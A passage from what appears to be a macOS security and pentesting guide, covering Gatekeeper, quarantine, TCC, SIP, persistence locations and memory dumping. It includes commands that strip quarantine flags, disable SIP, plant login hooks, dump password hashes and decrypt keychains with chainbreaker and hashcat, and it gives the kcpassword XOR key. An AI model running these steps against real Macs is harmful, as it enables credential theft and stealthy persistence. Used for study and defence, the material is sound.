-l a.txt #The file length is still q +-rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt +``` + +You can **find all the files containing this extended attribute** with: + +```bash +find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +``` + +### Risk Files Mac OS + +The files `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` contains the risk associated to files depending on the file extension. + +The possible categories include the following: + +* **LSRiskCategorySafe**: **Totally** **safe**; Safari will auto-open after download +* **LSRiskCategoryNeutral**: No warning, but **not auto-opened** +* **LSRiskCategoryUnsafeExecutable**: **Triggers** a **warning** “This file is an application...” +* **LSRiskCategoryMayContainUnsafeExecutable**: This is for things like archives that contain an executable. It **triggers a warning unless Safari can determine all the contents are safe or neutral**. + +### Remote Access Services + +You can enable/disable these services in "System Preferences" --> Sharing + +* **VNC**, known as “Screen Sharing” +* **SSH**, called “Remote Login” +* **Apple Remote Desktop** \(ARD\), or “Remote Management” +* **AppleEvent**, known as “Remote Apple Event” + +Check if any is enabled running: + +```bash +rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); +scrShrng=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.5900" | wc -l); +flShrng=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | egrep "\*.88|\*.445|\*.548" | wc -l); +rLgn=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.22" | wc -l); +rAE=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.3031" | wc -l); +bmM=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.4488" | wc -l); +printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; +``` + +### MacOS Architecture + +{% page-ref page="mac-os-architecture.md" %} + +### MacOS Serial Number + +{% page-ref page="macos-serial-number.md" %} + +### MacOS MDM + +{% page-ref page="macos-mdm/" %} + +### MacOS Protocols + +{% page-ref page="macos-protocols.md" %} + +### MacOS - Inspecting, Debugging and Fuzzing + +{% page-ref page="macos-apps-inspecting-debugging-and-fuzzing.md" %} + +## MacOS Security Mechanisms + +### Gatekeeper + +[**In this talk**](https://www.youtube.com/watch?v=T5xfL9tEg44) Jeremy Brown talks about this protections and a bug that allowed to bypass them. + +_**Gatekeeper**_ is designed to ensure that, by default, **only trusted software runs on a user’s Mac**. Gatekeeper is used when a user **downloads** and **opens** an app, a plug-in or an installer package from outside the App Store. Gatekeeper verifies that the software is **signed by** an **identified developer**, is **notarised** by Apple to be **free of known malicious content**, and **hasn’t been altered**. Gatekeeper also **requests user approval** before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file. + +### Notarizing + +In order for an **app to be notarised by Apple**, the developer needs to send the app for review. Notarization is **not App Review**. The Apple notary service is an **automated system** that **scans your software for malicious content**, checks for code-signing issues, and returns the results to you quickly. If there are no issues, the notary service generates a ticket for you to staple to your software; the notary service also **publishes that ticket online where Gatekeeper can find it**. + +When the user first installs or runs your software, the presence of a ticket \(either online or attached to the executable\) **tells Gatekeeper that Apple notarized the software**. **Gatekeeper then places descriptive information in the initial launch dialog** indicating that Apple has already checked for malicious content. + +### File Quarantine + +Gatekeeper builds upon **File Quarantine.** +Upon download of an application, a particular **extended file attribute** \("quarantine flag"\) can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software. +When a user executes a "quarentined" file, **Gatekeeper** is the one that **performs the mentioned actions** to allow the execution of the file. + +It's possible to **check it's status and enable/disable** \(root required\) with: + +```bash +spctl --status +assessments enabled + +spctl --enable +spctl --disable +#You can also allow nee identifies to execute code using the binary "spctl" +``` + +You can also **find if a file has the quarantine extended attribute** with: + +```bash +xattr portada.png +com.apple.macl +com.apple.quarantine +``` + +Check the **value** of the **extended** **attributes** with: + +```bash +xattr -l portada.png +com.apple.macl: +00000000 03 00 53 DA 55 1B AE 4C 4E 88 9D CA B7 5C 50 F3 |..S.U..LN.....P.| +00000010 16 94 03 00 27 63 64 97 98 FB 4F 02 84 F3 D0 DB |....'cd...O.....| +00000020 89 53 C3 FC 03 00 27 63 64 97 98 FB 4F 02 84 F3 |.S....'cd...O...| +00000030 D0 DB 89 53 C3 FC 00 00 00 00 00 00 00 00 00 00 |...S............| +00000040 00 00 00 00 00 00 00 00 |........| +00000048 +com.apple.quarantine: 0081;607842eb;Brave;F643CD5F-6071-46AB-83AB-390BA944DEC5 +``` + +And **remove** that attribute with: + +```bash +xattr -d com.apple.quarantine portada.png +#You can also remove this attribute from every file with +find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine +``` + +And find all the quarantined files with: + +```bash +find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine" +``` + +### XProtect + +**X-Protect** is also part of Gatekeeper. **It's Apple’s built in malware scanner.** It keeps track of known malware hashes and patterns. +You can get information about the latest XProtect update running: + +```bash +system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 +``` + +### MRT: Malware Removal Tool + +Should malware make its way onto a Mac, macOS also includes technology to remediate infections. The _Malware Removal Tool \(MRT\)_ is an engine in macOS that remediates infections based on updates automatically delivered from Apple \(as part of automatic updates of system data files and security updates\). **MRT removes malware upon receiving updated information** and it continues to check for infections on restart and login. MRT doesn’t automatically reboot the Mac. \(From [here](https://support.apple.com/en-gb/guide/security/sec469d47bd8/web#:~:text=The%20Malware%20Removal%20Tool%20%28MRT,data%20files%20and%20security%20updates%29.)\) + +### Automatic Security Updates + +Apple issues the **updates for XProtect and MRT automatically** based on the latest threat intelligence available. By default, macOS checks for these updates **daily**. Notarisation updates are distributed using CloudKit sync and are much more frequent. + +### TCC + +**TCC \(Transparency, Consent, and Control\)** is a mechanism in macOS to **limit and control application access to certain features**, usually from a privacy perspective. This can include things such as location services, contacts, photos, microphone, camera, accessibility, full disk access, and a bunch more. + +From a user’s perspective, they see TCC in action **when an application wants access to one of the features protected by TCC**. When this happens the user is prompted with a dialog asking them whether they want to allow access or not. This response is then stored in the TCC database. + +![An example of a TCC prompt](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855) + +Check some of the **already given permissions** to apps in `System Preferences --> Security & Privacy --> Privacy --> Files and Folders`. + +The TCC database is just a **sqlite3 database**, which makes the task of investigating it much simpler. There are two different databases, a global one in `/Library/Application Support/com.apple.TCC/TCC.db` and a per-user one located in `/Users//Library/Application Support/com.apple.TCC/TCC.db`. The first database is **protected from editing with SIP**\(System Integrity Protection\), but you can read them by granting terminal\(or your editor\) **full disk access**. + +This information was [taken from here](https://rainforest.engineering/2021-02-09-macos-tcc/) \(read the **original source for more information**\). + +Some protected directories: + +* $HOME/Desktop +* $HOME/Documents +* $HOME/Downloads +* iCloud Drive +* ... + +Unprotected directories: + +* $HOME \(itself\) +* $HOME/.ssh, $HOME/.aws, etc +* /tmp + +#### Bypasses + +By default an access via **SSH** will have **"Full Disk Access"**. In order to disable this you need to have it listed but disabled \(removing it from the list won't remove those privileges\): + +![](../../.gitbook/assets/image%20%28563%29.png) + +Here you can find examples of how some **malwares have been able to bypass this protection**: + +* [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/) + +### Seatbelt Sandbox + +MacOS Sandbox works with the kernel extension Seatbelt. It makes applications run inside the sandbox **need to request access to resources outside of the limited sandbox**. This helps to ensure that **the application will be accessing only expected resources** and if it wants to access anything else it will need to ask for permissions to the user. + +Important **system services** also run inside their own custom **sandbox** such as the mdnsresponder service. You can view these custom **sandbox profiles** inside the **`/usr/share/sandbox`** directory. Other sandbox profiles can be checked in [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles). + +To start an application with a sandbox config you can use: + +```bash +sandbox-exec -f example.sb /Path/To/The/Application +``` + +{% hint style="info" %} +Note that the **Apple-authored** **software** that runs on **Windows** **doesn’t have additional security precautions**, such as application sandboxing. +{% endhint %} + +Bypasses examples: + +* [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html) +* [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) \(they are able to write files outside the sandbox whose name starts with `~$`\). + +### SIP - System Integrity Protection + +This protection was enabled to **help keep root level malware from taking over certain parts** of the operating system. Although this means **applying limitations to the root user** many find it to be worthwhile trade off. +The most notable of these limitations are that **users can no longer create, modify, or delete files inside** of the following four directories in general: + +* /System +* /bin +* /sbin +* /usr + +Note that there are **exceptions specified by Apple**: The file **`/System/Library/Sandbox/rootless.conf`** holds a list of **files and directories that cannot be modified**. But if the line starts with an **asterisk** it means that it can be **modified** as **exception**. +For example, the config lines: + +```bash + /usr +* /usr/libexec/cups +* /usr/local +* /usr/share/man +``` + +Means that `/usr` **cannot be modified** **except** for the **3 allowed** folders allowed. + +The final exception to these rules is that **any installer package signed with the Apple’s certificate can bypass SIP protection**, but **only Apple’s certificate**. Packages signed by standard developers will still be rejected when trying to modify SIP protected directories. + +Note that if **a file is specified** in the previous config file **but** it **doesn't exist, it can be created**. This might be used by malware to obtain stealth persistence. For example, imagine that a **.plist** in `/System/Library/LaunchDaemons` appears listed but it doesn't exist. A malware may c**reate one and use it as persistence mechanism.** + +Also, note how files and directories specified in **`rootless.conf`** have a **rootless extended attribute**: + +```bash +xattr /System/Library/LaunchDaemons/com.apple.UpdateSettings.plist +com.apple.rootless + +ls -lO /System/Library/LaunchDaemons/com.apple.UpdateSettings.plist +-rw-r--r--@ 1 root wheel restricted,compressed 412 1 Jan 2020 /System/Library/LaunchDaemons/com.apple.UpdateSettings.plist +``` + +**SIP** handles a number of **other limitations as well**. Like it **doesn't allows for the loading of unsigned kexts**. SIP is also responsible for **ensuring** that no OS X **system processes are debugged**. This also means that Apple put a stop to dtrace inspecting system processes. + +Check if SIP is enabled with: + +```bash +csrutil status +System Integrity Protection status: enabled. +``` + +If you want to **disable** **it**, you need to put the computer in recovery mode \(start it pressing command+R\) and execute: `csrutil disable` +You can also maintain it **enable but without debugging protections** doing: + +```bash +csrutil enable --without debug +``` + +For more **information about SIP** read the following response: [https://apple.stackexchange.com/questions/193368/what-is-the-rootless-feature-in-el-capitan-really](https://apple.stackexchange.com/questions/193368/what-is-the-rootless-feature-in-el-capitan-really) + +### Apple Binary Signatures + +When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.** + +```bash +#Get signer +codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" + +#Check if the app’s contents have been modified +codesign --verify --verbose /Applications/Safari.app + +#Check if the signature is valid +spctl --assess --verbose /Applications/Safari.app +``` + +## Installed Software & Services + +Check for **suspicious** applications installed and **privileges** over the.installed resources: + +```bash +system_profiler SPApplicationsDataType #Installed Apps +system_profiler SPFrameworksDataType #Instaled framework +lsappinfo list #Installed Apps +launchtl list #Services +``` + +## User Processes + +```bash +# will print all the running services under that particular user domain. +launchctl print gui/ + +# will print all the running services under root +launchctl print system + +# will print detailed information about the specific launch agent. And if it’s not running or you’ve mistyped, you will get some output with a non-zero exit code: Could not find service “com.company.launchagent.label” in domain for login +launchctl print gui//com.company.launchagent.label +``` + +## Auto Start Extensibility Point \(ASEP\) + +An **ASEP** is a location on the system that could lead to the **execution** of a binary **without** **user** **interaction**. The main ones used in OS X take the form of plists. + +### Launchd + +**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in: + +* `/Library/LaunchAgents`: Per-user agents installed by the admin +* `/Library/LaunchDaemons`: System-wide daemons installed by the admin +* `/System/Library/LaunchAgents`: Per-user agents provided by Apple. +* `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple. + +When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**. + +The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** \(as there are services like ssh that needs to be executed before any user access the system\). Also agents may use GUI while daemons need to run in the background. + +```markup + + + + + Label + com.apple.someidentifier + ProgramArguments + + /Users/username/malware + + RunAtLoad + StartInterval + 800 + KeepAlive + + SuccessfulExit + + + + +``` + +There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`\(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example\). + +{% hint style="info" %} +New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` \(however those plist files won't be automatically loaded after reboot\). +It's also possible to **unload** with `launchctl unload ` \(the process pointed by it will be terminated\), + +To **ensure** that there isn't **anything** \(like an override\) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` +{% endhint %} + +List all the agents and daemons loaded by the current user: + +```bash +launchctl list +``` + +### Cron + +List the cron jobs of the **current user** with: + +```bash +crontab -l +``` + +You can also see all the cron jobs of the users in **`/usr/lib/cron/tabs/`** and **`/var/at/tabs/`** \(needs root\). + +In MacOS several folders executing scripts with **certain frequency** can be found in: + +```bash +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/ +``` + +There you can find the regular **cron** **jobs**, the **at** **jobs** \(not very used\) and the **periodic** **jobs** \(mainly used for cleaning temporary files\). The daily periodic jobs can be executed for example with: `periodic daily`. + +### kext + +In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**: + +* `/System/Library/Extensions` + * KEXT files built into the OS X operating system. +* `/Library/Extensions` + * KEXT files installed by 3rd party software + +You can list currently loaded kext files with: + +```bash +kextstat #List loaded kext +kextload /path/to/kext.kext #Load a new one based on path +kextload -b com.apple.driver.ExampleBundle #Load a new one based on path +kextunload /path/to/kext.kext +kextunload -b com.apple.driver.ExampleBundle +``` + +For more information about [**kernel extensions check this section**](mac-os-architecture.md#i-o-kit-drivers). + +### **Login Items** + +In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**. +It it's possible to list them, add and remove from the command line: + +```bash +#List all items: +osascript -e 'tell application "System Events" to get the name of every login item' + +#Add an item: +osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}' + +#Remove an item: +osascript -e 'tell application "System Events" to delete login item "itemname"' +``` + +These items are stored in the file /Users/<username>/Library/Application Support/com.apple.backgroundtaskmanagementagent + +### At + +“At tasks” are used to **schedule tasks at specific times**. +These tasks differ from cron in that **they are one time tasks** t**hat get removed after executing**. However, they will **survive a system restart** so they can’t be ruled out as a potential threat. + +By **default** they are **disabled** but the **root** user can **enable** **them** with: + +```bash +sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist +``` + +This will create a file at 13:37: + +```bash +echo hello > /tmp/hello | at 1337 +``` + +If AT tasks aren't enabled the created tasks won't be executed. + +### Login/Logout Hooks + +They are deprecated but can be used to execute commands when a user logs in. + +```bash +cat > $HOME/hook.sh << EOF +#!/bin/bash +echo 'My is: \`id\`' > /tmp/login_id.txt +EOF +chmod +x $HOME/hook.sh +defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh +``` + +This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` + +```bash +defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist +{ + LoginHook = "/Users/username/hook.sh"; + MiniBuddyLaunch = 0; + TALLogoutReason = "Shut Down"; + TALLogoutSavesState = 0; + oneTimeSSMigrationComplete = 1; +} +``` + +To delete it: + +```bash +defaults delete com.apple.loginwindow LoginHook +``` + +In the previous example we have created and deleted a **LoginHook**, it's also possible to create a **LogoutHook**. + +The root user one is stored in `/private/var/root/Library/Preferences/com.apple.loginwindow.plist` + +### Emond + +Apple introduced a logging mechanism called **emond**. It appears it was never fully developed, and development may have been **abandoned** by Apple for other mechanisms, but it remains **available**. + +This little-known service may **not be much use to a Mac admin**, but to a threat actor one very good reason would be to use it as a **persistence mechanism that most macOS admins probably wouldn't know** to look for. Detecting malicious use of emond shouldn't be difficult, as the System LaunchDaemon for the service looks for scripts to run in only one place: + +```bash +ls -l /private/var/db/emondClients +``` + +{% hint style="danger" %} +**As this isn't used much, anything in that folder should be suspicious** +{% endhint %} + +### Startup Items + +{% hint style="danger" %} +**This is deprecated, so nothing should be found in the following directories.** +{% endhint %} + +A **StartupItem** is a **directory** that gets **placed** in one of these two folders. `/Library/StartupItems/` or `/System/Library/StartupItems/` + +After placing a new directory in one of these two locations, **two more items** need to be placed inside that directory. These two items are a **rc script** **and a plist** that holds a few settings. This plist must be called “**StartupParameters.plist**”. + +{% code title="StartupParameters.plist" %} +```markup + + + + + Description + This is a description of this service + OrderPreference + None + Provides + + superservicename + + + +``` +{% endcode %} + +{% code title="superservicename" %} +```bash +#!/bin/sh +. /etc/rc.common + +StartService(){ + touch /tmp/superservicestarted +} + +StopService(){ + rm /tmp/superservicestarted +} + +RestartService(){ + echo "Restarting" +} + +RunService "$1" +``` +{% endcode %} + +### /etc/rc.common + +{% hint style="danger" %} +**This isn't working in modern MacOS versions** +{% endhint %} + +It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script: + +```bash +## +# Common setup for startup scripts. +## +# Copyright 1998-2002 Apple Computer, Inc. +## + +####################### +# Configure the shell # +####################### + +## +# Be strict +## +#set -e +set -u + +## +# Set command search path +## +PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH + +## +# Set the terminal mode +## +#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then +# TERM=$(tset - -Q); export TERM +#fi + +#################### +# Useful functions # +#################### + +## +# Determine if the network is up by looking for any non-loopback +# internet network interfaces. +## +CheckForNetwork() +{ + local test + + if [ -z "${NETWORKUP:=}" ]; then + test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) + if [ "${test}" -gt 0 ]; then + NETWORKUP="-YES-" + else + NETWORKUP="-NO-" + fi + fi +} + +alias ConsoleMessage=echo + +## +# Process management +## +GetPID () +{ + local program="$1" + local pidfile="${PIDFILE:=/var/run/${program}.pid}" + local pid="" + + if [ -f "${pidfile}" ]; then + pid=$(head -1 "${pidfile}") + if ! kill -0 "${pid}" 2> /dev/null; then + echo "Bad pid file $pidfile; deleting." + pid="" + rm -f "${pidfile}" + fi + fi + + if [ -n "${pid}" ]; then + echo "${pid}" + return 0 + else + return 1 + fi +} + +## +# Generic action handler +## +RunService () +{ + case $1 in + start ) StartService ;; + stop ) StopService ;; + restart) RestartService ;; + * ) echo "$0: unknown argument: $1";; + esac +} +``` + +### Profiles + +Configuration profiles can force a user to use certain browser settings, DNS proxy settings, or VPN settings. Many other payloads are possible which make them ripe for abuse. + +You can enumerate them running: + +```bash +ls -Rl /Library/Managed\ Preferences/ +``` + +### Other persistence techniques and tools + +* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift) +* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA) + +## Memory Artifacts + +### Swap Files + +* **`/private/var/vm/swapfile0`**: This file is used as a **cache when physical memory fills up**. Data in physical memory will be pushed to the swapfile and then swapped back into physical memory if it’s needed again. More than one file can exist in here. For example, you might see swapfile0, swapfile1, and so on. +* **`/private/var/vm/sleepimage`**: When OS X goes into **hibernation**, **data stored in memory is put into the sleepimage file**. When the user comes back and wakes the computer, memory is restored from the sleepimage and the user can pick up where they left off. + + By default in modern MacOS systems this file will be encrypted, so it might be not recuperable. + + * However, the encryption of this file might be disabled. Check the out of `sysctl vm.swapusage`. + +### Dumping memory with osxpmem + +In order to dump the memory in a MacOS machine you can use [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip). + +```bash +#Dump raw format +sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem + +#Dump aff4 format +sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4 +``` + +If you find this error: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` You can fix it doing: + +```bash +sudo cp -r osxpmem.app/MacPmem.kext "/tmp/" +sudo kextutil "/tmp/MacPmem.kext" +#Allow the kext in "Security & Privacy --> General" +sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem +``` + +**Other errors** might be fixed by **allowing the load of the kext** in "Security & Privacy --> General", just **allow** it. + +You can also use this **oneliner** to download the application, load the kext and dump the memory: + +```bash +sudo su +cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem +``` + +## Passwords + +### Shadow Passwords + +Shadow password is stored withe the users configuration in plists located in **`/var/db/dslocal/nodes/Default/users/`**. +The following oneliner can be use to dump **all the information about the users** \(including hash info\): + +```bash +for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done +``` + +\*\*\*\*[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**. + +### Keychain Dump + +Note that when using the security binary to **dump the passwords decrypted**, several prompts will ask the user to allow this operation. + +```bash +#security +secuirty dump-trust-settings [-s] [-d] #List certificates +security list-keychains #List keychain dbs +security list-smartcards #List smartcards +security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries +security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root) +``` + +### [Keychaindump](https://github.com/juuso/keychaindump) + +The attacker still needs to gain access to the system as well as escalate to **root** privileges in order to run **keychaindump**. This approach comes with its own conditions. As mentioned earlier, **upon login your keychain is unlocked by default** and remains unlocked while you use your system. This is for convenience so that the user doesn’t need to enter their password every time an application wishes to access the keychain. If the user has changed this setting and chosen to lock the keychain after every use, keychaindump will no longer work; it relies on an unlocked keychain to function. + +It’s important to understand how Keychaindump extracts passwords out of memory. The most important process in this transaction is the ”**securityd**“ **process**. Apple refers to this process as a **security context daemon for authorization and cryptographic operations**. The Apple developer libraries don’t say a whole lot about it; however, they do tell us that securityd handles access to the keychain. In his research, Juuso refers to the **key needed to decrypt the keychain as ”The Master Key“**. A number of steps need to be taken to acquire this key as it is derived from the user’s OS X login password. If you want to read the keychain file you must have this master key. The following steps can be done to acquire it. **Perform a scan of securityd’s heap \(keychaindump does this with the vmmap command\)**. Possible master keys are stored in an area flagged as MALLOC\_TINY. You can see the locations of these heaps yourself with the following command: + +```bash +sudo vmmap | grep MALLOC_TINY +``` + +**Keychaindump** will then search the returned heaps for occurrences of 0x0000000000000018. If the following 8-byte value points to the current heap, we’ve found a potential master key. From here a bit of deobfuscation still needs to occur which can be seen in the source code, but as an analyst the most important part to note is that the necessary data to decrypt this information is stored in securityd’s process memory. Here’s an example of keychain dump output. + +```bash +sudo ./keychaindump +``` + +{% hint style="danger" %} +Base on this comment [https://github.com/juuso/keychaindump/issues/10\#issuecomment-751218760](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) it looks like this tools isn't working anymore in Big Sur. +{% endhint %} + +### chainbreaker + +\*\*\*\*[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner: + +* Hashed Keychain password, suitable for cracking with [hashcat](https://hashcat.net/hashcat/) or [John the Ripper](https://www.openwall.com/john/) +* Internet Passwords +* Generic Passwords +* Private Keys +* Public Keys +* X509 Certificates +* Secure Notes +* Appleshare Passwords + +Given the keychain unlock password, a master key obtained using [volafox](https://github.com/n0fate/volafox) or [volatility](https://github.com/volatilityfoundation/volatility), or an unlock file such as SystemKey, Chainbreaker will also provide plaintext passwords. + +Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information. + +#### Dump keychain keys + +```bash +#Dump all keys of the keychain (without the passwords) +python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain +``` + +#### Dump keychain keys \(with passwords\) with SystemKey + +```bash +# First, get the keychain decryption key +## To get this decryption key you need to be root and SIP must be disabled +hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo +### Use the previous key to decrypt the passwords +python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain +``` + +#### Dump keychain keys \(with passwords\) cracking the hash + +```bash +# Get the keychain hash +python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain +# Crack it with hashcat +hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt +# Use the key to decrypt the passwords +python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain +``` + +#### Dump keychain keys \(with passwords\) with memory dump + +[Follow these steps](./#dumping-memory-with-osxpmem) to perform a **memory dump** + +```bash +#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords +## Unformtunately volafox isn't working with the latest versions of MacOS +python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump + +#Try to extract the passwords using the extracted keychain passwords +python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain +``` + +#### Dump keychain keys \(with passwords\) using users password + +If you know the users password you can use it to **dump and decrypt keychains that belong to the user**. + +```bash +#Prompt to ask for the password +python2.7 chainbreaker.py --dump-all --password-prompt /Users//Library/Keychains/login.keychain-db +``` + +### kcpassword + +The **kcpassword** file is a file that holds the **user’s login password**, but only if the system owner has **enabled automatic login**. Therefore, the user will be automatically logged in without being asked for a password \(which isn't very secure\). + +The password is stored in the file **`/etc/kcpassword`** xored with the key **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`**. If the users password is longer than the key, the key will be reused. +This makes the password pretty easy to recover, for example using scripts like [**this one**](https://gist.github.com/opshope/32f65875d45215c3677d). + +## **Library injection** + +### Dylib Hijacking + +As in Windows, in MacOS you can also **hijack dylibs** to make **applications** **execute** **arbitrary** **code**. +However, the way **MacOS** applications **load** libraries is **more restricted** than in Windows. This implies that **malware** developers can still use this technique for **stealth**, but the probably to be able to **abuse this to escalate privileges is much lower**. + +First of all, is **more common** to find that **MacOS binaries indicates the full path** to the libraries to load. And second, **MacOS never search** in the folders of the **$PATH** for libraries. + +However, there are 2 types of dylib hijacking: + +* **Missing weak linked libraries**: This means that the application will try to load a library that doesn't exist configured with **LC\_LOAD\_WEAK\_DYLIB**. Then, **if an attacker places a dylib where it's expected it will be loaded**. + * The fact that the link is "weak" means that the application will continue running even if the library isn't found. +* **Configured with @rpath**: The path to the library configured contains "**@rpath**" and it's configured with **multiple** **LC\_RPATH** containing **paths**. Therefore, **when loading** the dylib, the loader is going to **search** \(in order\) **through all the paths** specified in the **LC\_RPATH** **configurations**. If anyone is missing and **an attacker can place a dylib there** and it will be loaded. + +The way to **escalate privileges** abusing this functionality would be in the rare case that an **application** being executed **by** **root** is **looking** for some **library in some folder where the attacker has write permissions.** + +**A nice scanner to find missing libraries in applications is** [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) **or a** [**CLI version**](https://github.com/pandazheng/DylibHijack)**. +A nice report with technical details about this technique can be found** [**here**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)**.** + +### **DYLD\_INSERT\_LIBRARIES** + +> This is a colon separated **list of dynamic libraries** to l**oad before the ones specified in the program**. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules. Note that this has no effect on images built a two-level namespace images using a dynamic shared library unless DYLD\_FORCE\_FLAT\_NAMESPACE is also used. + +This is like the [**LD\_PRELOAD on Linux**](../../linux-unix/privilege-escalation/#ld_preload). + +This technique may be also **used as an ASEP technique** as every application installed has a plist called "Info.plist" that allows for the **assigning of environmental variables** using a key called `LSEnvironmental`. + +{% hint style="info" %} +Since 2012 when [OSX.FlashBack.B](https://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_b.shtml) \[22\] abused this technique, **Apple has drastically reduced the “power”** of the DYLD\_INSERT\_LIBRARIES. + +For example the dynamic loader \(dyld\) ignores the DYLD\_INSERT\_LIBRARIES environment variable in a wide range of cases, such as setuid and platform binaries. And, starting with macOS Catalina, only 3rd-party applications that are not compiled with the hardened runtime \(which “protects the runtime integrity of software” \[22\]\), or have an exception such as the com.apple.security.cs.allow-dyld-environment-variables entitlement\) are susceptible to dylib insertions. + +For more details on the security features afforded by the hardened runtime, see Apple’s documentation: “[Hardened Runtime](https://developer.apple.com/documentation/security/hardened_runtime)” +{% endhint %} + +## Interesting Information in Databases + +### Messages + +```bash +sqlite3 $HOME/Library/Messages/chat.db 